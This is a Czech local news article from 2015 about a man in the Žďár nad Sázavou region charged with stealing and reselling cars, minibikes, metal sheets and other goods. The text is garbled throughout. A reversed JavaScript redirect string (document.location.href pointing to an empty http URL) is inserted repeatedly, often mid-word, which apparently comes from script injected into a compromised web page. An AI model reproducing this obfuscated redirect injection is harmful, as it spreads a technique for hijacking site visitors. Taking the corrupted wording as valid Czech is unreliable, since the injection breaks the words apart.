Rainbow page separator

Kriminalisté stíhají muže pro krádeže aut a dalších věcí

Čtvrtek, 23. dubna 2015

Policejní auto, policie, měření rychlosti

Žďár nad Sázavou / Třicetiletého muže ze Žďárska stíhají žďárští kriminalisté. Odcizil několik aut a dalších věcí, je obviněn ze tří trestných činů a hrozí mu až pět let vězení.

Muž je obviněn z [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toho, že od konce ledna do začátku dubna z areálu zemědělské společnosti v Pohledci odtáhl nepojízdné au[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to Škoda Rapid v hodnotě deset tisíc korun, jež prodal za dva tisíce. „Na konci března se vloupal do garáže ve stejném areálu a odcizil dva malé mo[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tocykly, takzvané minibike, kovový žebřík a tři dřevěné trakaře. V březnu muž převzal od známého klíče od jeho auta Alfa Romeo s tím, že mu zprostředkuje prodej. Vozidlo prodal, peníze si ale ponechal pro vlastní potřebu. Na přelomu března a dubna z uzamčené haly ve Lnářské ulici v Bystřici nad Pernštejnem odcizil 35 kusů čtyřmetrových plechů v hodnotě přes 36 tisíc korun. Ty pak prodal za deset tisíc korun. Na začátku dubna ze stejné haly odtáhl nepojízdné vozidlo VW Golf, které následně prodal,“ popsala praktiky zloděje policejní mluvčí Monika Pátková.

Začátkem dubna muž odcizil ze s[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tolu v bývalé restauraci rekonstruovaného hotelu v Bystřici klíče od auta značky Audi. Klíče po několika dnech předal svému známému, kterému sdělil, že se jedná o jeho vůz, a požádal ho, aby ho odvezl z parkoviště u hotelu na smluvené mís[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to. Au[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to pak opět prodal a do zastavárny dal televizor, který se v něm nacházel.

K tíži obviněnému jde i fakt, že řídil au[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tomobily, přes[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tože byl v minulosti několikrát odsouzen za řízení bez řidičského oprávnění a maření výkonu úředního rozhodnutí a měl uložen trest zákazu řízení mo[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];torových vozidel. „Obviněný svým jednáním způsobil škodu přesahující částku dvě stě tisíc korun,“ řekl Radek Uhlíř, vedoucí žďárských kriminalistů. „Většinu odcizených věcí a vozidel se nám podařilo zajistit a předat zpět majitelům,“ dodal Uhlíř.